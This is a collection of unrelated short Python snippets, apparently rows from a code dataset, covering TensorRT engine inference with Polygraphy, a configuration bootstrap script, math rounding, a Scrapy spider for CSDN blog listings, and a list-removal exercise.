# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
This script loads the TensorRT engine built by `build_and_run.py` and runs inference.
"""
import numpy as np
from polygraphy.backend.common import BytesFromPath
from polygraphy.backend.trt import EngineFromBytes, TrtRunner
def main():
# Just as we did when building, we can compose multiple loaders together
# to achieve the behavior we want. Specifically, we want to load a serialized
# engine from a file, then deserialize it into a TensorRT engine.
load_engine = EngineFromBytes(BytesFromPath("identity.engine"))
# Inference remains virtually exactly the same as before:
with TrtRunner(load_engine) as runner:
inp_data = np.ones(shape=(1, 1, 2, 2), dtype=np.float32)
# NOTE: The runner owns the output buffers and is free to reuse them between `infer()` calls.
# Thus, if you want to store results from multiple inferences, you should use `copy.deepcopy()`.
outputs = runner.infer(feed_dict={"x": inp_data})
assert np.array_equal(outputs["y"], inp_data) # It's an identity model!
print("Inference succeeded!")
if __name__ == "__main__":
main()
|
990,996 | 80f95fa98b5bc37bcea7fa02b69b2e30ce231a3b | #!/usr/bin/env python -B
"""
Bootstrap the configuration for a module that uses the ortho module to control the configuration.
Note that this script must be called `bootstrap.py` and must supply a function called `bootstrap_default`
which returns the default configuration and/or a function called `bootstrap_post` which runs other
configuration tasks. If these are missing the user is warned.
"""
from __future__ import print_function
# currently using default envs which expects a local link to Miniconda3-latest-Linux-x86_64.sh
# see environments.py for instructions on (re)-loading a complicated envs section after bootstrapping
# you could also make your own default configuration for use with ortho
default_configuration = {
'commands':[],
#! tee will always log to file: 'tee':'log-last',
}
def bootstrap_default():
"""
Return default configuration.
You can also run other commands here
but they will not print to stdout and they cannot use the config yet.
"""
return default_configuration
def bootstrap_post():
"""
Commands after configuration is written.
For some reason `make config` fails here.
"""
import os
print('status','running bootstrap_post from bootstrap.py')
os.system('make config')
return
|
990,997 | 14ac550e7b44d460a183b2084dfbd6b566511e8d | import math
print(math.floor(3.7))
print(math.ceil(3.7))
|
990,998 | 3b24b3b877e7a6bc30666148c95adf9e172b7624 |
# csdn
import scrapy
import json
import time
class CsdnBlogsSpider(scrapy.Spider):
# t = str(time.time()).replace
name = 'blogs_csdn_spider'
allowed_domains = ['blog.csdn.net']
# new表示刚刷新的文章,more刚刷新下面的表示全部文章
start_urls = ['https://blog.csdn.net/api/articles?type=new&category=home']
def parse(self, response):
data = json.loads(response.text)
for item in data['articles']:
print(item['title'])
print(item['url'])
print(item['views'])
print(item['created_at'])
|
990,999 | 9f07a69fb51531aa26e45ee9898268f120d3dbb7 | # import re
#
# str = 'code // annotation'
#
# # ret = re.findall('o', str) # 返回所有满足匹配条件的结果,放在列表里
# ret = re.findall('\/\/[^\n]*', str) # 返回所有满足匹配条件的结果,放在列表里,不明白这里为什么要对斜杠(/)转义
# # [^\n]* 匹配不是(^)换行符(\n)的任意字符若干次(*)
# ret2 = re.sub('\/\/[^\n]*', '', str)
# print(ret2)
# # print('\/\/')
ll = [1, 3, 5, 3, 4, 3]
for i in ll[:]:
if i==3:
ll.remove(i)
if i==5:
break
print(ll) |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.